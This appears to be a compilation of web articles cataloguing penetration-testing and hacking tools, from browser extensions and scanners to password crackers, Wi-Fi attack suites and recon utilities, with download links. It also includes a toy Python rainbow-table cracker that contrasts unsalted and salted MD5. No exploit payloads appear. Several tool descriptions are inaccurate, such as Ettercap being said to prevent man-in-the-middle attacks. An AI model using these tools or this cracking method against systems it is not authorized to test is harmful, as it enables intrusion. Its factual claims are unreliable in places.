https://chrome.google.com/webstore/detail/site-spider-mark-ii/gedjofgioahckekhpgknhchelbpdogok?hl=en
Note Anywhere:
Ethical hacking of web applications starts with collecting basic to advanced
information about the targeted websites, and ethical hackers normally use different
word processors to save that information and load it quickly whenever needed. Note
Anywhere makes it much easier to save and load that information quickly: it lets users
write notes directly on a website in real time and brings those notes back whenever the
user visits that website again. It also shows the number of notes created on a particular
page, and you can import, export and share notes. This extension is for Chrome users.

Link(Chrome):
https://chrome.google.com/webstore/detail/note-anywhere/bohahkiiknkelflnjjlipnaeapefmjbh
D3coder:
D3coder is a Chrome-based browser extension that instantly encrypts and decrypts
text and computes hashes using different standard algorithms. It also uses a dictionary
to crack common hashes. Besides encryption and decryption, it supports encodings
such as Base64. It is often useful, as ethical hackers constantly need to encode and
decode keys and hashes on the spot.

Link(Chrome):
https://chrome.google.com/webstore/detail/d3coder/gncnbkghencmkfgeepfaonmegemakcol?hl=en
[Bonus] Penetration Testing Kit
Penetration Testing Kit is an extension bundling helpers for many penetration testing
techniques used by ethical hackers. It provides an interface for sending requests and
viewing request and response information. Moreover, you can build your own requests
and use it as a request builder to test for SQL injection, XSS and other form-related
vulnerabilities by inspecting the responses. This is a Chrome-based extension.

Link(Chrome):
https://chrome.google.com/webstore/detail/penetration-testing-kit/ojkchikaholjmcnefhjlbohackpeeknd?hl=en-GB
Conclusion
That is all for this article. I hope it was helpful, gave you a good insight into useful
browser extensions, and that you will use this knowledge to do good.

Top Penetration Testing Software & Tools


1. Netsparker
Netsparker Security Scanner is a popular automated web application security scanner
for penetration testing. The software can identify everything from cross-site scripting to
SQL injection. Developers can use this tool on websites, web services, and web
applications.

The system is powerful enough to scan between 500 and 1000 web applications at the
same time. You can customize your security scan with attack options, authentication,
and URL rewrite rules. Netsparker automatically exercises weak spots in a read-only
way and produces proof of exploitation, so the impact of each vulnerability is
immediately visible.

Benefits:
 Scan 1000+ web applications in less than a day!
 Add multiple team members for collaboration and easy shareability of findings.
 Automatic scanning ensures a limited set up is necessary.
 Searches for exploitable SQL and XSS vulnerabilities in web applications.
 Legal web application and regulatory compliance reports.
 Proof-based scanning Technology guarantees accurate detection.

2. Wireshark
Once known as Ethereal 0.2.0, Wireshark is an award-winning network analyzer with
600 authors. With this software, you can quickly capture and interpret network
packets. The tool is open-source and available for various systems, including
Windows, Solaris, FreeBSD, and Linux.

Benefits:
 Provides both offline analysis and live-capture options.
 Capturing data packets allows you to explore various traits, including source and
destination protocol.
 It offers the ability to investigate the smallest details for activities throughout a
network.
 Optional adding of coloring rules to the pack for rapid, intuitive analysis.

3. Metasploit
Metasploit is the most widely used penetration testing automation framework in the
world. It helps professional teams verify and manage security assessments, improves
awareness, and arms and empowers defenders to stay a step ahead.

It is useful for checking security, pinpointing flaws, and setting up a defense. An open
source tool, it allows a network administrator to break in and identify critical weak
points. Beginner hackers use it to build their skills. The tool also provides a way to
replicate websites for social engineering tests.

Benefits:
 Easy to use with GUI clickable interface and command line.
 Manual brute-forcing, payloads to evade leading solutions, spear phishing, and
awareness, an app for testing OWASP vulnerabilities.
 Collects testing data for over 1,500 exploits.
 MetaModules for network segmentation tests.
 You can use this to explore older vulnerabilities within your infrastructure.
 Available on Mac Os X, Windows and Linux.
 Can be used on servers, networks, and applications.

4. BeEF
This is a pen testing tool best suited for checking a web browser. It is adapted for
combating web-borne attacks and could benefit mobile clients. BeEF stands for
Browser Exploitation Framework, and its issue tracking lives on GitHub. BeEF is
designed to explore weaknesses beyond the client system and network perimeter;
instead, the framework looks at exploitability within the context of just one source, the
web browser.
Benefits:
 You can use client-side attack vectors to check security posture.
 Connects with more than one web browser and then launches directed command
modules.

5. John The Ripper Password Cracker


Passwords are one of the most prominent vulnerabilities. Attackers may use
passwords to steal credentials and enter sensitive systems. John the Ripper is the
essential tool for password cracking and provides a range of systems for this purpose.
The pen testing tool is a free open source software.

Benefits:
 Automatically identifies different password hashes.
 Discovers password weaknesses within databases.
 Pro version is available for Linux, Mac OS X, Hash Suite, Hash Suite Droid.
 Includes a customizable cracker.
 Allows users to explore documentation online. This includes a summary of changes
between separate versions.

6. Aircrack
Aircrack-ng is designed for finding flaws in wireless connections by capturing data
packets and exporting them to text files for analysis. While the software seemed
abandoned in 2010, Aircrack was updated again in 2019.

This tool is supported on various OSes and platforms and supports WEP dictionary
attacks. It offers improved tracking speed compared to most other penetration tools
and supports multiple cards and drivers. After capturing the WPA handshake, the suite
is capable of using a password dictionary and statistical techniques to break into WEP.

Benefits:
 Works with Linux, Windows, OS X, FreeBSD, NetBSD, OpenBSD, and Solaris.
 You can use this tool to capture packets and export data.
 It is designed for testing wifi devices as well as driver capabilities.
 Focuses on different areas of security, such as attacking, monitoring, testing, and
cracking.
 In terms of attacking, you can perform de-authentication, establish fake access points,
and perform replay attacks.
7. Acunetix Scanner
Acunetix is an automated testing tool you can use to complete a penetration test. The
tool can audit complex applications and produce management and compliance
reports. The software can handle a range of network vulnerabilities. Acunetix is
even capable of detecting out-of-band vulnerabilities.

The advanced tool integrates with popular issue trackers and WAFs. With a high
detection rate, Acunetix offers some of the industry's most advanced cross-site scripting
and SQLi testing, including sophisticated detection of XSS.

Benefits:
 The tool covers over 4500 weaknesses, including SQL injection as well as XSS.
 The Login Sequence Recorder is easy-to-implement and scans password-protected
areas.
 The AcuSensor Technology, Manual Penetration tools, and Built-in Vulnerability
Management streamline black and white box testing to enhance and enable
remediation.
 Can crawl hundreds of thousands of web pages without delay.
 Ability to run locally or through a cloud solution.

8. Burp Suite Pen Tester


There are two different versions of Burp Suite for developers. The free version
provides the essential tools needed for scanning activities, or you can opt for the
paid version if you need advanced penetration testing. This tool is ideal for checking
web-based applications. There are tools to map the attack surface and analyze requests
between a browser and destination servers. The framework performs web penetration
testing on the Java platform and is an industry-standard tool used by the majority of
information security professionals.

Benefits:
 Capable of automatically crawling web-based applications.
 Available on Windows, OS X, and Linux.

9. Ettercap
The Ettercap suite is designed to prevent man-in-the-middle attacks. Using this
application, you can build the packets you want and perform specific tasks. The
software can send invalid frames and complete techniques that are more difficult with
other tools.
Benefits:
 This tool is ideal for deep packet sniffing as well as monitoring and testing LAN.
 Ettercap supports active and passive dissection of protocols.
 You can complete content filtering on the fly.
 The tool also provides settings for both network and host analysis.

10. W3af
The w3af web application attack and audit framework is focused on finding and
exploiting vulnerabilities in web applications. Three types of plugins are provided:
attack, audit, and discovery. The discovery results are then passed on to the audit
plugins to check for security flaws.

Benefits:
 Easy to use for amateurs and powerful enough for developers.
 It can complete automated HTTP request generation and raw HTTP requests.
 Capability to be configured to run as a MITM proxy.

11. Nessus
Nessus has been used as a security penetration testing tool for twenty years. 27,000
companies utilize the application worldwide. The software is one of the most
powerful testing tools on the market with over 45,000 CEs and 100,000 plugins.
Ideally suited for scanning IP addresses, websites and completing sensitive data
searches. You will be able to use this to locate ‘weak spots’ in your systems.

The tool is straightforward to use and offers accurate scanning and at the click of a
button, providing an overview of your network’s vulnerabilities. The pen test
application scans for open ports, weak passwords, and misconfiguration errors.

Benefits:
 Ideal for locating and identifying missing patches as well as malware.
 The system only has 0.32 defects per 1 million scans.
 You can create customized reports, including types of vulnerabilities by plugin or
host.
 In addition to web application, mobile scanning, and cloud environment, the tool
offers priority remediation.

12. Kali Linux


Kali Linux is a Linux distribution built for advanced penetration testing. Many experts
believe it is the best tool for both injection and password sniffing. However, you will
need skills in TCP/IP protocols to gain the most benefit. An open-source project, Kali
Linux provides tool listings, version tracking, and meta-packages.

Benefits:
 With 64 bit support, you can use this tool for brute force password cracking.
 Kali uses a live image loaded into the RAM to test the security skills of ethical
hackers.
 Kali has over 600 ethical hacking tools.
 Various security tools for vulnerability analysis, web applications, information
gathering, wireless attacks, reverse engineering, password cracking, forensic tools,
web applications, spoofing, sniffing, exploitation tools, and hardware hacking are
available.
 Easy integration with other penetration testing tools, including Wireshark and
Metasploit.
 BackTrack provides tools for WLAN and LAN vulnerability assessment
scanning, digital forensics, and sniffing.

13. SQLmap
SQLmap is an SQL injection takeover tool for databases. Supported database
platforms include MySQL, SQLite, Sybase, DB2, Access, MSSQL, PostgreSQL.
SQLmap is open-source and automates the process of exploiting database servers and
SQL injection vulnerabilities.

Benefits:
 Detects and maps vulnerabilities.
 Provides support for all injection methods: Union, Time, Stack, Error, Boolean.
 Runs at the command line and can be downloaded for Linux, Mac OS, and
Windows systems.

14. (SET) Social Engineer Toolkit


Social engineering is the primary focus of the toolkit. Despite the aim and focus,
human beings are not the target of the vulnerability scanner.

Benefits:
 It has been featured at top cybersecurity conferences, including ShmooCon, Defcon,
DerbyCon and is an industry-standard for penetration tests.
 SET has been downloaded over 2 million times.
 An open-source testing framework designed for social engineering detection.

15. Zed Attack Proxy


OWASP ZAP (Zed Attack Proxy) is part of the free OWASP community. It is ideal
for developers and testers that are new to penetration testing. The project started in
2010 and is improved daily. ZAP runs in a cross-platform environment creating a
proxy between the client and your website.

Benefits:
 4 modes available with customizable options.
 To install ZAP, JAVA 8+ is required on your Windows or Linux system.
 The help section is comprehensive with a Getting Started (PDF), Tutorial, User
Guide, User Groups, and StackOverflow.
 Users can learn all about Zap development through Source Code, Wiki, Developer
Group, Crowdin, OpenHub, and BountySource.

16. Wapiti
Wapiti is an application security tool that allows black box testing. Black box testing
checks web applications for potential liabilities. During the black box testing process,
web pages are scanned, and the testing data is injected to check for any lapses in
security.
 Experts will find ease-of-usability with the command-line application.
 Wapiti identifies vulnerabilities in file disclosure, XSS Injection, Database injection,
XXE injection, Command Execution detection, and easily bypassed
compromised .htaccess configurations.

17. Cain & Abel


Cain & Abel is ideal for procuring network keys and passwords through penetration
testing. The tool uses network sniffing to find weaknesses.
 The Windows-based software can recover passwords using network sniffers,
cryptanalysis attacks, and brute force.
 Excellent for recovery of lost passwords.
20 Best Ethical Hacking Tools & Software for
Hackers (2020)
What are Hacking Tools?
Hacking tools are computer programs and scripts that help you find and exploit
weaknesses in computer systems, web applications, servers and networks. There are a
variety of such tools available on the market. Users can easily download hacking tools
for ethical hacking. Some of them are open source while others are commercial solutions.

Following is a handpicked list of the top 20 ethical hacking tools, with their popular
features and website links to download them. The list contains both open source (free)
and commercial (paid) hacking tools.

Top Hacking Tools, Programs & Software Downloads

Name           Platform              Link
Netsparker     Windows, Linux        Learn More
Acunetix       Windows, Linux, Mac   Learn More
Traceroute NG  Windows               Learn More

1) Netsparker

Netsparker is an easy-to-use web application security scanner that can automatically
find SQL Injection, XSS and other vulnerabilities in your web applications and web
services. It is available as an on-premises and SaaS solution.

Features

 Dead accurate vulnerability detection with the unique Proof-Based Scanning
Technology.
 Minimal configuration required. Scanner automatically detects URL rewrite
rules, custom 404 error pages.
 REST API for seamless integration with the SDLC, bug tracking systems etc.
 Fully scalable solution. Scan 1,000 web applications in just 24 hours.
2) Acunetix
Acunetix is a fully automated ethical hacking solution that mimics a hacker to keep
one step ahead of malicious intruders. The web application security scanner accurately
scans HTML5, JavaScript and Single-page applications. It can audit complex,
authenticated webapps and issues compliance and management reports on a wide
range of web and network vulnerabilities.

Features:

 Scans for all variants of SQL Injection, XSS, and 4500+ additional
vulnerabilities
 Detects over 1200 WordPress core, theme, and plugin vulnerabilities
 Fast & Scalable – crawls hundreds of thousands of pages without interruptions
 Integrates with popular WAFs and Issue Trackers to aid in the SDLC
 Available On Premises and as a Cloud solution.

3) Traceroute NG
Traceroute NG is an application that enables you to analyze network paths. This
software can identify IP addresses, hostnames, and packet loss. It provides accurate
analysis through a command-line interface.

Features:

 It offers both TCP and ICMP network path analysis.
 This application can create a txt logfile.
 Supports both IPv4 and IPv6.
 Detects path changes and gives you a notification.
 Allows continuous probing of a network.
4) SaferVPN
SaferVPN is an indispensable tool in an ethical hacker's arsenal. You may need it to
check targets in different geographies, simulate non-personalized browsing behavior,
anonymize file transfers, etc.

Features:

 No-log VPN with high security and anonymity
 Very fast speeds with 2000+ servers across continents
 Based in Hong Kong, it does not store any data.
 Split tunneling and 5 simultaneous logins
 24/7 support
 Supports Windows, Mac, Android, Linux, iPhone, etc.
 300,000+ IPs
 Port forwarding, dedicated IP and P2P protection
 31-day money-back guarantee

5) Burp Suite:

Burp Suite is a useful platform for performing security testing of web applications.
Its various tools work seamlessly together to support the entire pen testing process,
from initial mapping to analysis of an application's attack surface.

Features:

 It is one of the best hacking tools that can detect over 3000 web application
vulnerabilities.
 Scan open-source software and custom-built applications
 An easy-to-use Login Sequence Recorder allows automatic scanning
 Review vulnerability data with built-in vulnerability management.
 Easily produce a wide variety of technical and compliance reports
 Detects critical vulnerabilities with 100% accuracy
 Automated crawl and scan
 It is one of the best hacking tools, providing advanced scanning features for
manual testers
 Cutting-edge scanning logic

Download link: https://portswigger.net/burp/freedownload

6) Ettercap:

Ettercap is an ethical hacking tool. It supports active and passive dissection and
includes features for network and host analysis.

Features:

 It is one of the best hacker tools that supports active and passive dissection of
many protocols
 Feature of ARP poisoning to sniff on a switched LAN between two hosts
 Characters can be injected into a server or to a client while maintaining a live
connection
 Ettercap is capable of sniffing an SSH connection in full duplex
 It is one of the best hackers tools that allows sniffing of HTTP SSL secured
data even when the connection is made using proxy
 Allows creation of custom plugins using Ettercap's API

Download link: https://ettercap.github.io/ettercap/downloads.html

7) Aircrack:
Aircrack is one of the best and most trusted ethical hacking tools on the market. It
cracks vulnerable wireless connections protected by WEP, WPA and WPA2 encryption
keys.

Features:

 More cards/drivers supported
 Supports all types of OS and platforms
 New WEP attack: PTW
 Support for WEP dictionary attack
 Support for fragmentation attack
 Improved tracking speed

Download link: https://www.aircrack-ng.org/downloads.html

8) Angry IP Scanner:

Angry IP Scanner is an open-source and cross-platform ethical hacking tool. It scans IP
addresses and ports.

Features:

 This network hacking tool scans local networks as well as the Internet
 Free and open-source hack tool
 Targets can be random or loaded from a file in any format
 Exports results into many formats
 Extensible with many data fetchers
 Provides command-line interface
 This hacking software works on Windows, Mac, and Linux
 No need for Installation

Download link: http://angryip.org/download/#windows

9) GFI LanGuard:
GFI LanGuard is an ethical hacking tool that scans networks for vulnerabilities. It can
act as your 'virtual security consultant' on demand. It allows creating an asset inventory
of every device.

Features:

 It helps to maintain a secure network over time by knowing which changes are
affecting your network
 Patch management: fix vulnerabilities before an attack
 Analyze the network centrally
 Discover security threats early
 Reduce cost of ownership by centralizing vulnerability scanning
 Helps to maintain a secure and compliant network

Download link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard/download

10) Savvius:

It is one of the best tools for ethical hacking. It identifies performance issues and
reduces security risk with the deep visibility provided by Omnipeek. It can diagnose
network issues faster and better with Savvius packet intelligence.

Features:

 Powerful, easy-to-use network forensics software
 Savvius automates the capture of the network data required to quickly
investigate security alerts
 Software and integrated appliance solutions
 Packet intelligence combined with deep analysis
 This network hacking tool provides rapid resolution of network and security
issues
 Easy-to-use, intuitive workflow
 Expert and responsive technical support
 Onsite deployment for appliances
 Commitment to our customers and our products

Download link: https://www.savvius.com/distributed_network_analysis_suite_trial

11) QualysGuard:

QualysGuard helps businesses streamline their security and compliance solutions and
builds security into their digital transformation initiatives. It is one of the best hacker
tools for checking the vulnerability of online cloud systems.

Features:

 It is one of the best online hacking tools and is trusted globally
 No hardware to buy or manage
 It is a scalable, end-to-end solution for all aspects of IT security
 Vulnerability data securely stored and processed on an n-tiered architecture of
load-balanced servers
 Its sensors provide continuous visibility
 Data analyzed in real time
 It can respond to threats in real time

Download link: https://www.qualys.com/forms/freescan/

12) WebInspect:

WebInspect is an automated dynamic application security testing tool that allows
performing ethical hacking techniques. It is one of the best hacking tools, providing
comprehensive dynamic analysis of complex web applications and services.

Features:

 Allows testing the dynamic behavior of running web applications to identify
security vulnerabilities
 Keep in control of your scan by getting relevant information and statistics at a
glance
 Centralized program management
 Advanced technologies, such as simultaneous crawl, bring professional-level
testing to novice security testers
 Easily inform management on vulnerability trending, compliance management,
and risk oversight

Download link: https://www.microfocus.com/en-us/products/webinspect-dynamic-analysis-dast/how-it-works

13) Hashcat:

Hashcat is one of the most robust password cracking and ethical hacking tools. It can
help users recover lost passwords, audit password security, or just find out what
data is stored in a hash.

Features:

 Open-Source platform
 Multi-Platform Support
 This hacking software allows utilizing multiple devices in the same system
 Utilizing mixed device types in the same system
 It supports distributed cracking networks
 Supports interactive pause/resume
 Supports sessions and restore
 Built-in benchmarking system
 Integrated thermal watchdog
 Supports automatic performance tuning

Download link: https://hashcat.net/hashcat/

14) L0phtCrack:
L0phtCrack 6 is a useful password audit and recovery tool. It identifies and assesses
password vulnerability on local machines and across networks.

Features:

 Multicore & multi-GPU support helps to optimize hardware
 Easy to customize
 Simple password loading
 Schedule sophisticated tasks for automated enterprise-wide password
 Fix weak password issues by forcing password resets or locking accounts
 It allows auditing multiple OSes

Download link: http://www.l0phtcrack.com/#download-form

15) Rainbow Crack:


RainbowCrack is a password cracking and ethical hacking tool widely used for
hacking devices. It cracks hashes with rainbow tables, using a time-memory trade-off
algorithm for this purpose.

Features:

 Full time-memory trade-off tool suite, including rainbow table generation
 Supports rainbow tables for any hash algorithm
 Supports rainbow tables for any charset
 Supports rainbow tables in raw file format (.rt) and compact file format
 Computation on multi-core processors supported
 GPU acceleration with multiple GPUs
 Runs on Windows and Linux
 Unified rainbow table file format on every supported OS
 Command-line user interface
 Graphical user interface

Download link: http://project-rainbowcrack.com/index.htm
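The time-memory trade-off behind rainbow tables, shown here as an added example that is not part of the original article or of the RainbowCrack project: a toy table over unsalted MD5 hashes of three-letter lowercase passwords. The charset, password length, chain length, start points and the reduction function are assumptions chosen to keep the table tiny; the structure (hash, reduce, chain, endpoint lookup, chain regeneration) is the general algorithm. The last function makes the defender's point: a per-user salt moves the stored hash outside the precomputed space, so the same table finds nothing.

```python
import hashlib

# Toy parameters (assumptions for this example, not RainbowCrack's defaults):
# the password space is every 3-letter lowercase string (26**3 = 17576 values),
# the hash is unsalted MD5, and each chain applies CHAIN_LEN hash/reduce steps.
CHARSET = "abcdefghijklmnopqrstuvwxyz"
PW_LEN = 3
CHAIN_LEN = 50
SPACE = len(CHARSET) ** PW_LEN


def pw_hash(pw: str) -> bytes:
    """Unsalted MD5 of a candidate password."""
    return hashlib.md5(pw.encode()).digest()


def reduce_fn(digest: bytes, col: int) -> str:
    """Map a digest back into the password space.

    Mixing in the column index gives each chain position its own reduction
    function, so two chains only merge if they collide at the same column."""
    n = (int.from_bytes(digest[:8], "big") + col) % SPACE
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def build_table(start_points):
    """Precompute the chains but store only (endpoint -> start point)."""
    table = {}
    for start in start_points:
        p = start
        for col in range(CHAIN_LEN):
            p = reduce_fn(pw_hash(p), col)
        # two chains ending at the same endpoint have merged; keep the first
        table.setdefault(p, start)
    return table


def lookup(table, target: bytes):
    """Search for a preimage of target using only the stored endpoints.

    Assume the password sits at column k of some chain: reduce the target as
    column k would, walk to the end of that chain and check whether the
    endpoint is stored. If it is, regenerate the chain from its start point and
    return the password whose hash equals the target. A false alarm (the
    regenerated chain never reaches the target) simply moves on to the next k."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        x = reduce_fn(target, k)
        for j in range(k + 1, CHAIN_LEN):
            x = reduce_fn(pw_hash(x), j)
        start = table.get(x)
        if start is None:
            continue
        p = start
        for col in range(CHAIN_LEN):
            if pw_hash(p) == target:
                return p
            p = reduce_fn(pw_hash(p), col)
    return None


def salted_hash(salt: bytes, pw: str) -> bytes:
    """Defender's side: a per-user salt makes the stored value depend on
    salt||password, which the precomputed table never enumerated."""
    return hashlib.md5(salt + pw.encode()).digest()


# Constructed start points: a handful of chains is enough to show the mechanism.
START_POINTS = ["cat", "dog", "key", "sun", "mud", "fox", "pen", "ice"]
TABLE = build_table(START_POINTS)


def demo():
    """Crack an unsalted hash that lies on a chain; fail on a salted one."""
    on_chain = reduce_fn(pw_hash("cat"), 0)  # second password of the 'cat' chain
    found = lookup(TABLE, pw_hash(on_chain))
    salted = lookup(TABLE, salted_hash(b"per-user-salt:", "cat"))
    return found, salted


if __name__ == "__main__":
    found, salted = demo()
    print("unsalted hash on a chain ->", found)
    print("salted hash of 'cat'     ->", salted)
```

With eight chains of fifty steps the table covers at most 400 of the 17576 possible passwords, which is why a real table needs many more chains; the lookup cost grows with the square of the chain length, which is the other side of the trade-off.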

16) IKECrack:
IKECrack is an open source authentication cracking tool. This ethical hacking tool is
designed for brute-force or dictionary attacks. It is one of the best hacker tools for
performing cryptography tasks.

Features:

 IKECrack is a tool that allows performing cryptography tasks
 The initiating client sends an encryption options proposal, DH public key, random
number, and an ID in an unencrypted packet to the gateway/responder.
 It is one of the best hacking programs freely available for both personal and
commercial use. Therefore, it is a perfect choice for users who want an option for
cryptography programs

Download link: http://ikecrack.sourceforge.net/

17) IronWASP:

IronWASP is an open source hacking software for web application vulnerability
testing. It is designed to be customizable so that users can create their own custom
security scanners using it.

Features:

 GUI based and very easy to use
 It has a powerful and effective scanning engine
 Supports recording login sequences
 Reporting in both HTML and RTF formats
 It is one of the best hacking programs that checks for over 25 types of web
vulnerabilities
 False positive and negative detection support
 It supports Python and Ruby
 Extensible using plug-ins or modules in Python, Ruby, C# or VB.NET

Download link: https://sboxr.com/download.html


18) Medusa
Medusa is one of the best online brute-force, speedy, parallel password cracking
ethical hacking tools. This hacking toolkit is also widely used for ethical hacking.

Features:

 It is designed to be a speedy, massively parallel, modular login brute-forcer
 The main aim of this hacking software is to support as many services as possible
which allow remote authentication
 It is one of the best online hacking tools that allows performing thread-based
parallel testing and brute-force testing
 Flexible user input; it can be specified in a variety of ways
 Each service module exists as an independent .mod file.
 No modifications are needed to the core application to extend the supported list
of services for brute-forcing

Download link: http://foofus.net/goons/jmk/medusa/medusa.html

19) NetStumbler

NetStumbler is a hacking software used to detect wireless networks on the Windows
platform.

Features:

 Verifying network configurations
 Finding locations with poor coverage in a WLAN
 Detecting causes of wireless interference
 Detecting unauthorized ("rogue") access points
 Aiming directional antennas for long-haul WLAN links

Download link: http://www.stumbler.net/


20) SQLMap

SQLMap automates the process of detecting and exploiting SQL Injection
weaknesses. It is open source and cross platform. It supports the following database
engines.

 MySQL
 Oracle
 Postgre SQL
 MS SQL Server
 MS Access
 IBM DB2
 SQLite
 Firebird
 Sybase and SAP MaxDB

It supports the following SQL Injection Techniques;

 Boolean-based blind
 Time-based blind
 Error-based
 UNION query
 Stacked queries and out-of-band.

Download link: http://sqlmap.org/

21) Cain & Abel

Cain & Abel is a password recovery tool for Microsoft operating systems. It is used to:

 Recover MS Access passwords
 Uncover password fields
 Sniff networks
 Crack encrypted passwords using dictionary, brute-force, and cryptanalysis
attacks.

Download link: http://www.softpedia.com/get/Security/Decrypting-Decoding/Cain-and-Abel.shtml

22) Nessus

Nessus can be used to perform:

 Remote vulnerability scanning
 Password dictionary attacks
 Denial of service attacks.

It is closed source, cross-platform and free for personal use.

Download link: https://www.tenable.com/products/nessus/nessus-professional

23) Zenmap

Zenmap is the official Nmap Security Scanner software. It is a multi-platform free and
open source application. It is easy to use for beginners but also offers advanced
features for experienced users.

Features:

 Interactive and graphical results viewing
 It summarizes details about a single host or a complete scan in a convenient
display.
 It can even draw a topology map of discovered networks.
 It can show the differences between two scans.
 It allows administrators to track new hosts or services appearing on their
networks, or to track existing services that go down.

Download link: https://nmap.org/download.html

100 HACKING TOOLS AND RESOURCES
May 29, 2020 | HackerOne
As we recently surpassed $100 million in bounties, we want to continue the celebration
with this list of 100 tools and resources for hackers! These range from beginner to expert. Most
are free but some cost money. Check them out to add to your own hacking toolkit! We’ll add
these to our GitHub on Hacker101/_resources/ so feel free to continue adding even more tools
and resources!

Burp Suite
1. Burp Suite: The quintessential web app hacking tool. Once you hit 500 reputation on
HackerOne, you are eligible for a free 3-month license of Burp Suite Pro! Check out these
awesome Burp plugins:
2. ActiveScan++: ActiveScan++ extends Burp Suite's active and passive scanning capabilities.
Designed to add minimal network overhead, it identifies application behavior that may be of
interest to advanced testers.
3. BurpSentinel: With BurpSentinel it is possible for the penetration tester to quickly and easily
send a lot of malicious requests to parameters of a HTTP request. Not only that, but it also shows
a lot of information of the HTTP responses, corresponding to the attack requests. It's easy to find
low-hanging fruit and hidden vulnerabilities like this, and it also allows the tester to focus on
more important stuff!
4. Autorepeater Burp: Automated HTTP request repeating with Burp Suite.
5. Autorize Burp: Autorize is an extension aimed at helping the penetration tester to detect
authorization vulnerabilities—one of the more time-consuming tasks in a web application
penetration test.
6. Burp Beautifier: BurpBeautifier is a Burp Suite extension for beautifying request/response
bodies, supporting the JS, JSON, HTML and XML formats, written in Jython 2.7.
7. Flow: This extension provides a Proxy history-like view along with search filter capabilities
for all Burp tools.
8. Headless Burp: This extension allows you to run Burp Suite's Spider and Scanner tools in
headless mode via the command-line.
9. Logger++: Logger++ is a multi-threaded logging extension for Burp Suite. In addition to
logging requests and responses from all Burp Suite tools, the extension allows advanced filters to
be defined to highlight interesting entries or filter logs to only those which match the filter.
10. WSDL Wizard: This extension scans a target server for WSDL files. After performing
normal mapping of an application's content, right click on the relevant target in the site map, and
choose "Scan for WSDL files" from the context menu. The extension will search the already
discovered contents for URLs with the .wsdl file extension, and guess the locations of any
additional WSDL files based on the file names known to be in use. The results of the scanning
appear within the extension's output tab in the Burp Extender tool.
11. JSON_Beautifier: This plugin provides a JSON tab with beautified representation of the
request/response.
Web Hacking
12. JSParser: A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from
JavaScript files. This is especially useful for discovering AJAX requests when performing
security research or bug bounty hunting.
13. Knockpy: Knockpy is a python tool designed to enumerate subdomains on a target domain
through a word list. It is designed to scan for a DNS zone transfer and bypass the wildcard DNS
record automatically, if it is enabled. Knockpy now supports queries to VirusTotal subdomains;
you can set the API_KEY within the config.json file.
14. Lazys3: A Ruby script to brute-force for AWS s3 buckets using different permutations.
15. Sublist3r: Sublist3r is a python tool designed to enumerate subdomains of websites using
OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the
domain they are targeting. Sublist3r enumerates subdomains using many search engines such as
Google, Yahoo, Bing, Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft,
Virustotal, ThreatCrowd, DNSdumpster and ReverseDNS.
16. Teh_s3_bucketeers: Teh_s3_bucketeers is a security tool to discover S3 buckets on
Amazon's AWS platform.
17. Virtual-host-discovery: This is a basic HTTP scanner that enumerates virtual hosts on a given
IP address. During recon, this might help expand the target by detecting old or deprecated code.
It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
18. Wpscan: WPScan is a free (for non-commercial use) black box WordPress security scanner
written for security professionals and bloggers to test the security of their sites.
19. Webscreenshot: A simple script to screenshot a list of websites, based on the url-to-image
PhantomJS script.
20. Asnlookup: The ASN Information tool displays information about an IP address's
Autonomous System Number (ASN), such as: IP owner, registration date, issuing registrar and
the max range of the AS with total IPs.
21. Unfurl: Unfurl is a tool that analyzes large collections of URLs and estimates their entropies
to sift out URLs that might be vulnerable to attack.
22. Waybackurls: Accept line-delimited domains on stdin, fetch known URLs from the Wayback
Machine for *.domain and output them on stdout.
23. Httprobe: Takes a list of domains and probes for working http and https servers.
24. Meg: Meg is a tool for fetching lots of URLs without taking a toll on the servers. It can be
used to fetch many paths for many hosts, or fetching a single path for all hosts before moving on
to the next path and repeating.
25. Gau: Getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the
Wayback Machine, and Common Crawl for any given domain. Inspired by Tomnomnom's
waybackurls.
26. Ffuf: A fast web fuzzer written in Go.
27. Dirsearch: A simple command line tool designed to brute force directories and files in
websites.
28. OWASP Zed: OWASP Zed Attack Proxy (ZAP) is an open source tool which is offered by
OWASP (Open Web Application Security Project), for penetration testing of your website/web
application. It helps you find the security vulnerabilities in your application.
29. Subfinder: Subfinder is a subdomain discovery tool that discovers valid subdomains for
websites by using passive online sources. It has a simple modular architecture and is optimized
for speed. Subfinder is built for doing one thing only - passive subdomain enumeration, and it
does that very well.
30. EyeWitness: EyeWitness is designed to take screenshots of websites, provide some server
header info, and identify any default credentials. EyeWitness is designed to run on Kali Linux. It
will auto detect the file you give it with the -f flag as either being a text file with URLs on each
new line, nmap xml output, or nessus xml output. The --timeout flag is completely optional, and
lets you provide the max time to wait when trying to render and screenshot a web page.
31. Nuclei: Nuclei is a fast tool for configurable targeted scanning based on templates offering
massive extensibility and ease of use.
32. Naabu: Naabu is a port scanning tool written in Go that allows you to enumerate valid ports
for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN scans on the
host/list of hosts and lists all ports that return a reply.
33. Shuffledns: ShuffleDNS is a wrapper around massdns written in go that allows you to
enumerate valid subdomains using active bruteforce, as well as resolve subdomains with
wildcard handling and easy input-output support.
34. Dnsprobe: DNSProbe is a tool built on top of retryabledns that allows you to perform
multiple dns queries of your choice with a list of user supplied resolvers.
35. Chaos: Chaos actively scans and maintains internet-wide assets' data. This project is meant to
enhance research and analyze changes around DNS for better insights.
36. Subjack: Subjack is a Subdomain Takeover tool written in Go designed to scan a list of
subdomains concurrently and identify ones that are able to be hijacked. With Go's speed and
efficiency, this tool really stands out when it comes to mass-testing. Always double check the
results manually to rule out false positives.
37. gitGraber: gitGraber is a tool developed in Python3 to monitor GitHub to search and find
sensitive data in real time for different online services.
38. Shhgit: Shhgit finds secrets and sensitive files across GitHub code and Gists committed in
nearly real-time by listening to the GitHub Events API.
39. Commit-stream: Commit-stream extracts commit logs from the Github event API, exposing
the author details (name and email address) associated with Github repositories in real time.
40. Masscan: This is an Internet-scale port scanner. It can scan the entire Internet in under 6
minutes, transmitting 10 million packets per second, all from a single machine.
41. Massdns: MassDNS is a simple high-performance DNS stub resolver targeting those who
seek to resolve a massive amount of domain names in the order of millions or even billions.
Without special configuration, MassDNS is capable of resolving over 350,000 names per second
using publicly available resolvers.
